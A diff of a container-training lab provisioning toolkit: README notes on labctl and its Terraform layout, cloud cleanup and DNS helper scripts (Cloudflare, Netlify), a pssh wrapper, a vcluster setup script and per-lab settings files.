||||
- run `./labctl destroy ...` when you don't need the environments anymore
|
||||
|
||||
## Customizing things
|
||||
|
||||
You can edit the `settings/*.env` files, for instance to change the size of the clusters, the login or password used for the students...
|
||||
|
||||
Note that these files are sourced before executing any operation on a specific set of lab environments, which means that you can set Terraform variables by adding lines like the following one in the `*.env` files:
|
||||
|
||||
```bash
|
||||
export TF_VAR_node_size=GP1.L
|
||||
export TF_VAR_location=eu-north
|
||||
```
|
||||
|
||||
## `./labctl` Usage
|
||||
|
||||
If you run `./labctl` without arguments, it will show a list of available commands.
|
||||
|
||||
### Summary of What `./labctl` Does For You
|
||||
|
||||
The script will create a Terraform configuration using a provider-specific template.
|
||||
|
||||
There are two modes: `pssh` and `mk8s`.
|
||||
|
||||
In `pssh` mode, students connect directly to the virtual machines using SSH.
|
||||
|
||||
The Terraform configuration creates a bunch of virtual machines, then the provisioning and configuration are done with `pssh`. There are a number of "steps" that are executed on the VMs, to install Docker, install a number of convenient tools, install and set up Kubernetes (if needed)... The list of "steps" to be executed is configured in the `settings/*.env` file.
|
||||
|
||||
In `mk8s` mode, students don't connect directly to the virtual machines. Instead, they connect to an SSH server running in a Pod (using the `jpetazzo/shpod` image), itself running on a Kubernetes cluster. The Kubernetes cluster is a managed cluster created by the Terraform configuration.
|
||||
|
||||
## `terraform` directory structure and principles
|
||||
|
||||
Legend:
|
||||
- `📁` directory
|
||||
- `📄` file
|
||||
- `📄📄📄` multiple files
|
||||
- `🌍` Terraform configuration that can be used "as-is"
|
||||
|
||||
```
|
||||
📁terraform
|
||||
├── 📁list-locations
|
||||
│ └── 📄📄📄 helper scripts
|
||||
│ (to list available locations for each provider)
|
||||
├── 📁many-kubernetes
|
||||
│ └── 📄📄📄 Terraform configuration template
|
||||
│ (used in mk8s mode)
|
||||
├── 📁one-kubernetes
|
||||
│ │ (contains Terraform configurations that can spawn
|
||||
│ │ a single Kubernetes cluster on a given provider)
|
||||
│ ├── 📁🌍aws
|
||||
│ ├── 📁🌍civo
|
||||
│ ├── 📄common.tf
|
||||
│ ├── 📁🌍digitalocean
|
||||
│ └── ...
|
||||
├── 📁providers
|
||||
│ ├── 📁aws
|
||||
│ │ ├── 📄config.tf
|
||||
│ │ └── 📄variables.tf
|
||||
│ ├── 📁azure
|
||||
│ │ ├── 📄config.tf
|
||||
│ │ └── 📄variables.tf
|
||||
│ ├── 📁civo
|
||||
│ │ ├── 📄config.tf
|
||||
│ │ └── 📄variables.tf
|
||||
│ ├── 📁digitalocean
|
||||
│ │ ├── 📄config.tf
|
||||
│ │ └── 📄variables.tf
|
||||
│ └── ...
|
||||
├── 📁tags
|
||||
│ │ (contains Terraform configurations + other files
|
||||
│ │ for a specific set of VMs or K8S clusters; these
|
||||
│ │ are created by labctl)
|
||||
│ ├── 📁2023-03-27-10-04-79-jp
|
||||
│ ├── 📁2023-03-27-10-07-41-jp
|
||||
│ ├── 📁2023-03-27-10-16-418-jp
|
||||
│ └── ...
|
||||
└── 📁virtual-machines
|
||||
│ (contains Terraform configurations that can spawn
|
||||
│ a bunch of virtual machines on a given provider)
|
||||
├── 📁🌍aws
|
||||
├── 📁🌍azure
|
||||
├── 📄common.tf
|
||||
├── 📁🌍digitalocean
|
||||
└── ...
|
||||
```
|
||||
|
||||
The directory structure can feel a bit overwhelming at first, but it's built with specific goals in mind.
|
||||
|
||||
**Consistent input/output between providers.** The per-provider configurations in `one-kubernetes` all take the same input variables, and provide the same output variables. Same thing for the per-provider configurations in `virtual-machines`.
|
||||
|
||||
**Don't repeat yourself.** As much as possible, common variables, definitions, and logic has been factored in the `common.tf` file that you can see in `one-kubernetes` and `virtual-machines`. That file is then symlinked in each provider-specific directory, to make sure that all providers use the same version of the `common.tf` file.
|
||||
|
||||
**Don't repeat yourself (again).** The things that are specific to each provider have been placed in the `providers` directory, and are shared between the `one-kubernetes` and the `virtual-machines` configurations. Specifically, for each provider, there is `config.tf` (which contains provider configuration, e.g. how to obtain the credentials for that provider) and `variables.tf` (which contains default values like which location and which VM size to use).
|
||||
|
||||
**Terraform configurations should work in `labctl` or standalone, without extra work.** The Terraform configurations (identified by 🌍 in the directory tree above) can be used directly. Just go to one of these directories, `terraform init`, `terraform apply`, and you're good to go. But they can also be used from `labctl`. `labctl` shouldn't barf out if you did a `terraform apply` in one of these directories (because it will only copy the `*.tf` files, and leave alone the other files, like the Terraform state).
|
||||
|
||||
The latter means that it should be easy to tweak these configurations, or create a new one, without having to use `labctl` to test it. It also means that if you want to use these configurations but don't care about `labctl`, you absolutely can!
|
||||
|
||||
## Miscellaneous info
|
||||
|
||||
### Making sure Python3 is the default (Mac only)
|
||||
|
||||
Check the `/usr/local/bin/python` symlink. It should be pointing to
|
||||
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
|
||||
instructions.
|
||||
|
||||
1) Verify that Python 3 is installed.
|
||||
|
||||
```
|
||||
ls -la /usr/local/Cellar/Python
|
||||
```
|
||||
|
||||
You should see one or more versions of Python 3. If you don't,
|
||||
install it with `brew install python`.
|
||||
|
||||
2) Verify that `python` points to Python3.
|
||||
|
||||
```
|
||||
ls -la /usr/local/bin/python
|
||||
```
|
||||
|
||||
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
|
||||
|
||||
```
|
||||
rm /usr/local/bin/python
|
||||
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
|
||||
# where xxxx is the most recent Python 3 version you saw above
|
||||
```
|
||||
|
||||
### AWS specific notes
|
||||
|
||||
Initial assumptions are you're using a root account. If you'd like to use a IAM user, it will need the right permissions. For `pssh` mode, that includes at least `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
|
||||
|
||||
In `pssh` mode, the Terraform configuration currently uses the default VPC and Security Group. If you want to use another one, you'll have to make changes to `terraform/virtual-machines/aws`.
|
||||
|
||||
The default VPC Security Group does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`.
|
||||
33
prepare-labs/cleanup.sh
Executable file
33
prepare-labs/cleanup.sh
Executable file
@@ -0,0 +1,33 @@
|
||||
#!/bin/sh
|
||||
|
||||
case "$1-$2" in
|
||||
linode-lb)
|
||||
linode-cli nodebalancers list --json |
|
||||
jq '.[] | select(.label | startswith("ccm-")) | .id' |
|
||||
xargs -n1 -P10 linode-cli nodebalancers delete
|
||||
;;
|
||||
linode-pvc)
|
||||
linode-cli volumes list --json |
|
||||
jq '.[] | select(.label | startswith("pvc")) | .id' |
|
||||
xargs -n1 -P10 linode-cli volumes delete
|
||||
;;
|
||||
digitalocean-lb)
|
||||
doctl compute load-balancer list --output json |
|
||||
jq .[].id |
|
||||
xargs -n1 -P10 doctl compute load-balancer delete --force
|
||||
;;
|
||||
digitalocean-pvc)
|
||||
doctl compute volume list --output json |
|
||||
jq '.[] | select(.name | startswith("pvc-")) | .id' |
|
||||
xargs -n1 -P10 doctl compute volume delete --force
|
||||
;;
|
||||
scaleway-pvc)
|
||||
scw instance volume list --output json |
|
||||
jq '.[] | select(.name | contains("_pvc-")) | .id' |
|
||||
xargs -n1 -P10 scw instance volume delete
|
||||
;;
|
||||
*)
|
||||
echo "Unknown combination of provider ('$1') and resource ('$2')."
|
||||
;;
|
||||
esac
|
||||
|
||||
63
prepare-labs/dns-cloudflare.sh
Executable file
63
prepare-labs/dns-cloudflare.sh
Executable file
@@ -0,0 +1,63 @@
|
||||
#!/bin/sh
|
||||
#set -eu
|
||||
|
||||
if ! command -v http >/dev/null; then
|
||||
echo "Could not find the 'http' command line tool."
|
||||
echo "Please install it (the package name might be 'httpie')."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
. ~/creds/creds.cloudflare.dns
|
||||
|
||||
cloudflare() {
|
||||
case "$1" in
|
||||
GET|POST|DELETE)
|
||||
METHOD="$1"
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
METHOD=""
|
||||
;;
|
||||
esac
|
||||
URI=$1
|
||||
shift
|
||||
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
|
||||
}
|
||||
|
||||
_list_zones() {
|
||||
cloudflare zones?per_page=100 | jq -r .result[].name
|
||||
}
|
||||
|
||||
_get_zone_id() {
|
||||
cloudflare zones?name=$1 | jq -r .result[0].id
|
||||
}
|
||||
|
||||
_populate_zone() {
|
||||
ZONE_ID=$(_get_zone_id $1)
|
||||
shift
|
||||
for IPADDR in $*; do
|
||||
case "$IPADDR" in
|
||||
*.*) TYPE=A;;
|
||||
*:*) TYPE=AAAA;;
|
||||
esac
|
||||
cloudflare zones/$ZONE_ID/dns_records "name=*" "type=$TYPE" "content=$IPADDR"
|
||||
cloudflare zones/$ZONE_ID/dns_records "name=\@" "type=$TYPE" "content=$IPADDR"
|
||||
done
|
||||
}
|
||||
|
||||
_clear_zone() {
|
||||
ZONE_ID=$(_get_zone_id $1)
|
||||
for RECORD_ID in $(
|
||||
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
|
||||
); do
|
||||
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
|
||||
done
|
||||
}
|
||||
|
||||
_add_zone() {
|
||||
cloudflare zones "name=$1"
|
||||
}
|
||||
|
||||
echo "This script is still work in progress."
|
||||
echo "You can source it and then use its individual functions."
|
||||
|
||||
@@ -2,16 +2,16 @@
|
||||
"""
|
||||
There are two ways to use this script:
|
||||
|
||||
1. Pass a file name and a tag name as a single argument.
|
||||
It will load a list of domains from the given file (one per line),
|
||||
and assign them to the clusters corresponding to that tag.
|
||||
There should be more domains than clusters.
|
||||
Example: ./map-dns.py domains.txt 2020-08-15-jp
|
||||
|
||||
2. Pass a domain as the 1st argument, and IP addresses then.
|
||||
1. Pass a domain as the 1st argument, and IP addresses then.
|
||||
It will configure the domain with the listed IP addresses.
|
||||
Example: ./map-dns.py open-duck.site 1.2.3.4 2.3.4.5 3.4.5.6
|
||||
|
||||
2. Pass two files names as argument, in which case the first
|
||||
file should contain a list of domains, and the second a list of
|
||||
groups of IP addresses, with one group per line.
|
||||
There should be more domains than groups of addresses.
|
||||
Example: ./map-dns.py domains.txt tags/2020-08-15-jp/clusters.txt
|
||||
|
||||
In both cases, the domains should be configured to use GANDI LiveDNS.
|
||||
"""
|
||||
import os
|
||||
@@ -30,18 +30,9 @@ domain_or_domain_file = sys.argv[1]
|
||||
if os.path.isfile(domain_or_domain_file):
|
||||
domains = open(domain_or_domain_file).read().split()
|
||||
domains = [ d for d in domains if not d.startswith('#') ]
|
||||
ips_file_or_tag = sys.argv[2]
|
||||
if os.path.isfile(ips_file_or_tag):
|
||||
lines = open(ips_file_or_tag).read().split('\n')
|
||||
clusters = [line.split() for line in lines]
|
||||
else:
|
||||
ips = open(f"tags/{ips_file_or_tag}/ips.txt").read().split()
|
||||
settings_file = f"tags/{tag}/settings.yaml"
|
||||
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
|
||||
clusters = []
|
||||
while ips:
|
||||
clusters.append(ips[:clustersize])
|
||||
ips = ips[clustersize:]
|
||||
clusters_file = sys.argv[2]
|
||||
lines = open(clusters_file).read().split('\n')
|
||||
clusters = [line.split() for line in lines]
|
||||
else:
|
||||
domains = [domain_or_domain_file]
|
||||
clusters = [sys.argv[2:]]
|
||||
@@ -1,7 +1,9 @@
|
||||
#!/bin/sh
|
||||
|
||||
set -eu
|
||||
|
||||
# https://open-api.netlify.com/#tag/dnsZone
|
||||
[ "$1" ] || {
|
||||
[ "${1-}" ] || {
|
||||
echo ""
|
||||
echo "Add a record in Netlify DNS."
|
||||
echo "This script is hardcoded to add a record to container.training".
|
||||
@@ -12,13 +14,31 @@
|
||||
echo "$0 del <recordid>"
|
||||
echo ""
|
||||
echo "Example to create a A record for eu.container.training:"
|
||||
echo "$0 add eu 185.145.250.0"
|
||||
echo "$0 add eu A 185.145.250.0"
|
||||
echo ""
|
||||
exit 1
|
||||
}
|
||||
|
||||
NETLIFY_USERID=$(jq .userId < ~/.config/netlify/config.json)
|
||||
NETLIFY_TOKEN=$(jq -r .users[$NETLIFY_USERID].auth.token < ~/.config/netlify/config.json)
|
||||
NETLIFY_CONFIG_FILE=~/.config/netlify/config.json
|
||||
if ! [ "${DOMAIN-}" ]; then
|
||||
DOMAIN=container.training
|
||||
fi
|
||||
|
||||
if ! [ -f "$NETLIFY_CONFIG_FILE" ]; then
|
||||
echo "Could not find Netlify configuration file ($NETLIFY_CONFIG_FILE)."
|
||||
echo "Try to run the following command, and try again:"
|
||||
echo "npx netlify-cli login"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if ! command -v http >/dev/null; then
|
||||
echo "Could not find the 'http' command line tool."
|
||||
echo "Please install it (the package name might be 'httpie')."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
NETLIFY_USERID=$(jq .userId < "$NETLIFY_CONFIG_FILE")
|
||||
NETLIFY_TOKEN=$(jq -r .users[$NETLIFY_USERID].auth.token < "$NETLIFY_CONFIG_FILE")
|
||||
|
||||
netlify() {
|
||||
URI=$1
|
||||
@@ -27,31 +47,33 @@ netlify() {
|
||||
}
|
||||
|
||||
ZONE_ID=$(netlify dns_zones |
|
||||
jq -r '.[] | select ( .name == "container.training" ) | .id')
|
||||
jq -r '.[] | select ( .name == "'$DOMAIN'" ) | .id')
|
||||
|
||||
_list() {
|
||||
netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq -r '.[] | select(.type=="A") | [.hostname, .type, .value, .id] | @tsv'
|
||||
jq -r '.[] | select(.type=="A" or .type=="AAAA") | [.hostname, .type, .value, .id] | @tsv' |
|
||||
sort |
|
||||
column --table
|
||||
}
|
||||
|
||||
_add() {
|
||||
NAME=$1.container.training
|
||||
ADDR=$2
|
||||
|
||||
NAME=$1.$DOMAIN
|
||||
TYPE=$2
|
||||
VALUE=$3
|
||||
|
||||
# It looks like if we create two identical records, then delete one of them,
|
||||
# Netlify DNS ends up in a weird state (the name doesn't resolve anymore even
|
||||
# though it's still visible through the API and the website?)
|
||||
|
||||
if netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq '.[] | select(.hostname=="'$NAME'" and .type=="A" and .value=="'$ADDR'")' |
|
||||
jq '.[] | select(.hostname=="'$NAME'" and .type=="'$TYPE'" and .value=="'$VALUE'")' |
|
||||
grep .
|
||||
then
|
||||
echo "It looks like that record already exists. Refusing to create it."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
netlify dns_zones/$ZONE_ID/dns_records type=A hostname=$NAME value=$ADDR ttl=300
|
||||
netlify dns_zones/$ZONE_ID/dns_records type=$TYPE hostname=$NAME value=$VALUE ttl=300
|
||||
|
||||
netlify dns_zones/$ZONE_ID/dns_records |
|
||||
jq '.[] | select(.hostname=="'$NAME'")'
|
||||
@@ -70,7 +92,7 @@ case "$1" in
|
||||
_list
|
||||
;;
|
||||
add)
|
||||
_add $2 $3
|
||||
_add $2 $3 $4
|
||||
;;
|
||||
del)
|
||||
_del $2
|
||||
|
Before Width: | Height: | Size: 127 KiB After Width: | Height: | Size: 127 KiB |
65
prepare-labs/konk.sh
Executable file
65
prepare-labs/konk.sh
Executable file
@@ -0,0 +1,65 @@
|
||||
#!/bin/sh
|
||||
#
|
||||
# Baseline resource usage per vcluster in our usecase:
|
||||
# 500 MB RAM
|
||||
# 10% CPU
|
||||
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
|
||||
# PRO2-XS = 4 core, 16 gb
|
||||
# Note that we also need 2 volumes per vcluster (one for vcluster itself, one for shpod),
|
||||
# so we might hit the maximum number of volumes per node!
|
||||
# (TODO: check what that limit is on Scaleway and Linode)
|
||||
#
|
||||
# With vspod:
|
||||
# 800 MB RAM
|
||||
# 33% CPU
|
||||
#
|
||||
|
||||
set -e
|
||||
|
||||
KONKTAG=konk
|
||||
PROVIDER=linode
|
||||
STUDENTS=2
|
||||
|
||||
case "$PROVIDER" in
|
||||
linode)
|
||||
export TF_VAR_node_size=g6-standard-6
|
||||
export TF_VAR_location=fr-par
|
||||
;;
|
||||
scaleway)
|
||||
export TF_VAR_node_size=PRO2-XS
|
||||
# For tiny testing purposes, these are okay too:
|
||||
#export TF_VAR_node_size=PLAY2-NANO
|
||||
export TF_VAR_location=fr-par-2
|
||||
;;
|
||||
esac
|
||||
|
||||
# set kubeconfig file
|
||||
export KUBECONFIG=~/kubeconfig
|
||||
|
||||
if [ "$PROVIDER" = "kind" ]; then
|
||||
kind create cluster --name $KONKTAG
|
||||
ADDRTYPE=InternalIP
|
||||
else
|
||||
if ! [ -f tags/$KONKTAG/stage2/kubeconfig.101 ]; then
|
||||
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag $KONKTAG
|
||||
fi
|
||||
cp tags/$KONKTAG/stage2/kubeconfig.101 $KUBECONFIG
|
||||
ADDRTYPE=ExternalIP
|
||||
fi
|
||||
|
||||
# set external_ip labels
|
||||
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="'$ADDRTYPE'")].address}{"\n"}{end}' |
|
||||
while read node address ignoredaddresses; do
|
||||
kubectl label node $node external_ip=$address
|
||||
done
|
||||
|
||||
# vcluster all the things
|
||||
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students $STUDENTS
|
||||
|
||||
# install prometheus stack because that's cool
|
||||
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
|
||||
--namespace prom-system --create-namespace \
|
||||
kube-prometheus-stack kube-prometheus-stack
|
||||
|
||||
# and also fix sysctl
|
||||
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system
|
||||
@@ -21,10 +21,13 @@ DEPENDENCIES="
|
||||
man
|
||||
pssh
|
||||
ssh
|
||||
wkhtmltopdf
|
||||
yq
|
||||
"
|
||||
|
||||
UNUSED_DEPENDENCIES="
|
||||
wkhtmltopdf
|
||||
"
|
||||
|
||||
# Check for missing dependencies, and issue a warning if necessary.
|
||||
missing=0
|
||||
for dependency in $DEPENDENCIES; do
|
||||
@@ -50,20 +50,6 @@ sep() {
|
||||
fi
|
||||
}
|
||||
|
||||
need_infra() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify infrastructure file. (e.g.: infra/aws)"
|
||||
fi
|
||||
if [ "$1" = "--infra" ]; then
|
||||
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Infrastructure file $1 doesn't exist."
|
||||
fi
|
||||
. "$1"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_tag() {
|
||||
if [ -z "$TAG" ]; then
|
||||
die "Please specify a tag. To see available tags, run: $0 tags"
|
||||
@@ -71,25 +57,12 @@ need_tag() {
|
||||
if [ ! -d "tags/$TAG" ]; then
|
||||
die "Tag $TAG not found (directory tags/$TAG does not exist)."
|
||||
fi
|
||||
for FILE in settings.yaml ips.txt infra.sh; do
|
||||
for FILE in mode provider settings.env status; do
|
||||
if [ ! -f "tags/$TAG/$FILE" ]; then
|
||||
warning "File tags/$TAG/$FILE not found."
|
||||
fi
|
||||
done
|
||||
. "tags/$TAG/infra.sh"
|
||||
. "lib/infra/$INFRACLASS.sh"
|
||||
}
|
||||
|
||||
need_settings() {
|
||||
if [ -z "$1" ]; then
|
||||
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
|
||||
fi
|
||||
if [ ! -f "$1" ]; then
|
||||
die "Settings file $1 doesn't exist."
|
||||
if [ -f "tags/$TAG/settings.env" ]; then
|
||||
. tags/$TAG/settings.env
|
||||
fi
|
||||
}
|
||||
|
||||
need_login_password() {
|
||||
USER_LOGIN=$(yq -r .user_login < tags/$TAG/settings.yaml)
|
||||
USER_PASSWORD=$(yq -r .user_password < tags/$TAG/settings.yaml)
|
||||
}
|
||||
1583
prepare-labs/lib/commands.sh
Normal file
1583
prepare-labs/lib/commands.sh
Normal file
File diff suppressed because it is too large
Load Diff
7
prepare-labs/lib/containerd-config.toml
Normal file
7
prepare-labs/lib/containerd-config.toml
Normal file
@@ -0,0 +1,7 @@
|
||||
version = 2
|
||||
[plugins."io.containerd.grpc.v1.cri".containerd]
|
||||
default_runtime_name = "runc"
|
||||
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
|
||||
runtime_type = "io.containerd.runc.v2"
|
||||
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
|
||||
SystemdCgroup = true
|
||||
@@ -1,32 +1,22 @@
|
||||
#!/usr/bin/env python3
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
import jinja2
|
||||
|
||||
|
||||
# Read settings from user-provided settings file
|
||||
context = yaml.safe_load(open(sys.argv[1]))
|
||||
|
||||
ips = list(open("ips.txt"))
|
||||
clustersize = context["clustersize"]
|
||||
context["logins"] = []
|
||||
for line in open("logins.jsonl"):
|
||||
if line.strip():
|
||||
context["logins"].append(json.loads(line))
|
||||
|
||||
print("---------------------------------------------")
|
||||
print(" Number of IPs: {}".format(len(ips)))
|
||||
print(" VMs per cluster: {}".format(clustersize))
|
||||
print(" Number of cards: {}".format(len(context["logins"])))
|
||||
print("---------------------------------------------")
|
||||
|
||||
assert len(ips)%clustersize == 0
|
||||
|
||||
clusters = []
|
||||
|
||||
while ips:
|
||||
cluster = ips[:clustersize]
|
||||
ips = ips[clustersize:]
|
||||
clusters.append(cluster)
|
||||
|
||||
context["clusters"] = clusters
|
||||
|
||||
template_file_name = context["cards_template"]
|
||||
template_file_path = os.path.join(
|
||||
os.path.dirname(__file__),
|
||||
@@ -35,23 +25,23 @@ template_file_path = os.path.join(
|
||||
template_file_name
|
||||
)
|
||||
template = jinja2.Template(open(template_file_path).read())
|
||||
with open("ips.html", "w") as f:
|
||||
f.write(template.render(**context))
|
||||
print("Generated ips.html")
|
||||
with open("cards.html", "w") as f:
|
||||
f.write(template.render(**context))
|
||||
print("Generated cards.html")
|
||||
|
||||
|
||||
try:
|
||||
import pdfkit
|
||||
paper_size = context["paper_size"]
|
||||
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
|
||||
with open("ips.html") as f:
|
||||
pdfkit.from_file(f, "ips.pdf", options={
|
||||
with open("cards.html") as f:
|
||||
pdfkit.from_file(f, "cards.pdf", options={
|
||||
"page-size": paper_size,
|
||||
"margin-top": margin,
|
||||
"margin-bottom": margin,
|
||||
"margin-left": margin,
|
||||
"margin-right": margin,
|
||||
})
|
||||
print("Generated ips.pdf")
|
||||
print("Generated cards.pdf")
|
||||
except ImportError:
|
||||
print("WARNING: could not import pdfkit; did not generate ips.pdf")
|
||||
print("WARNING: could not import pdfkit; did not generate cards.pdf")
|
||||
44
prepare-labs/lib/pssh.sh
Normal file
44
prepare-labs/lib/pssh.sh
Normal file
@@ -0,0 +1,44 @@
|
||||
# This file can be sourced in order to directly run commands on
|
||||
# a group of VMs whose IPs are located in ips.txt of the directory in which
|
||||
# the command is run.
|
||||
|
||||
pssh() {
|
||||
if [ -z "$TAG" ]; then
|
||||
>/dev/stderr echo "Variable \$TAG is not set."
|
||||
return
|
||||
fi
|
||||
|
||||
HOSTFILE="tags/$TAG/ips.txt"
|
||||
|
||||
[ -f $HOSTFILE ] || {
|
||||
>/dev/stderr echo "Hostfile $HOSTFILE not found."
|
||||
return
|
||||
}
|
||||
|
||||
echo "[parallel-ssh] $@"
|
||||
|
||||
# There are some routers that really struggle with the number of TCP
|
||||
# connections that we open when deploying large fleets of clusters.
|
||||
# We're adding a 1 second delay here, but this can be cranked up if
|
||||
# necessary - or down to zero, too.
|
||||
sleep ${PSSH_DELAY_PRE-1}
|
||||
|
||||
# When things go wrong, it's convenient to ask pssh to show the output
|
||||
# of the failed command. Let's make that easy with a DEBUG env var.
|
||||
if [ "$DEBUG" ]; then
|
||||
PSSH_I=-i
|
||||
else
|
||||
PSSH_I=""
|
||||
fi
|
||||
|
||||
$(which pssh || which parallel-ssh) -h $HOSTFILE -l ubuntu \
|
||||
--par ${PSSH_PARALLEL_CONNECTIONS-100} \
|
||||
--timeout 300 \
|
||||
-O LogLevel=ERROR \
|
||||
-O IdentityFile=tags/$TAG/id_rsa \
|
||||
-O UserKnownHostsFile=/dev/null \
|
||||
-O StrictHostKeyChecking=no \
|
||||
-O ForwardAgent=yes \
|
||||
$PSSH_I \
|
||||
"$@"
|
||||
}
|
||||
16
prepare-labs/map-dns.sh
Executable file
16
prepare-labs/map-dns.sh
Executable file
@@ -0,0 +1,16 @@
|
||||
#!/bin/sh
|
||||
|
||||
DOMAINS=domains.txt
|
||||
IPS=ips.txt
|
||||
|
||||
. ./dns-cloudflare.sh
|
||||
|
||||
paste "$DOMAINS" "$IPS" | while read domain ips; do
|
||||
if ! [ "$domain" ]; then
|
||||
echo "⚠️ No more domains!"
|
||||
exit 1
|
||||
fi
|
||||
_clear_zone "$domain"
|
||||
_populate_zone "$domain" $ips
|
||||
done
|
||||
echo "✅ All done."
|
||||
22
prepare-labs/settings/admin-kubenet.env
Normal file
22
prepare-labs/settings/admin-kubenet.env
Normal file
@@ -0,0 +1,22 @@
|
||||
CLUSTERSIZE=3
|
||||
|
||||
CLUSTERPREFIX=kubenet
|
||||
CLUSTERNUMBER=100
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubebins
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
22
prepare-labs/settings/admin-kuberouter.env
Normal file
22
prepare-labs/settings/admin-kuberouter.env
Normal file
@@ -0,0 +1,22 @@
|
||||
CLUSTERSIZE=3
|
||||
|
||||
CLUSTERPREFIX=kuberouter
|
||||
CLUSTERNUMBER=200
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubebins
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
27
prepare-labs/settings/admin-monokube.env
Normal file
27
prepare-labs/settings/admin-monokube.env
Normal file
@@ -0,0 +1,27 @@
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=monokube
|
||||
|
||||
# We're sticking to this in the first DMUC lab,
|
||||
# because it still works with Docker, and doesn't
|
||||
# require a ServiceAccount signing key.
|
||||
KUBEVERSION=1.19.11
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
disabledocker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubebins
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
26
prepare-labs/settings/admin-oldversion.env
Normal file
26
prepare-labs/settings/admin-oldversion.env
Normal file
@@ -0,0 +1,26 @@
|
||||
CLUSTERSIZE=3
|
||||
|
||||
CLUSTERPREFIX=oldversion
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
# For a list of old versions, check:
|
||||
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
|
||||
KUBEVERSION=1.28.9
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
21
prepare-labs/settings/admin-polykube.env
Normal file
21
prepare-labs/settings/admin-polykube.env
Normal file
@@ -0,0 +1,21 @@
|
||||
CLUSTERSIZE=3
|
||||
|
||||
CLUSTERPREFIX=polykube
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
kubepkgs
|
||||
kubebins
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
22
prepare-labs/settings/admin-test.env
Normal file
22
prepare-labs/settings/admin-test.env
Normal file
@@ -0,0 +1,22 @@
|
||||
CLUSTERSIZE=3
|
||||
|
||||
CLUSTERPREFIX=test
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
19
prepare-labs/settings/docker.env
Normal file
19
prepare-labs/settings/docker.env
Normal file
@@ -0,0 +1,19 @@
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=moby
|
||||
|
||||
USER_LOGIN=docker
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
terraform
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
ips
|
||||
"
|
||||
6
prepare-labs/settings/konk.env
Normal file
6
prepare-labs/settings/konk.env
Normal file
@@ -0,0 +1,6 @@
|
||||
CLUSTERSIZE=5
|
||||
|
||||
USER_LOGIN=k8s
|
||||
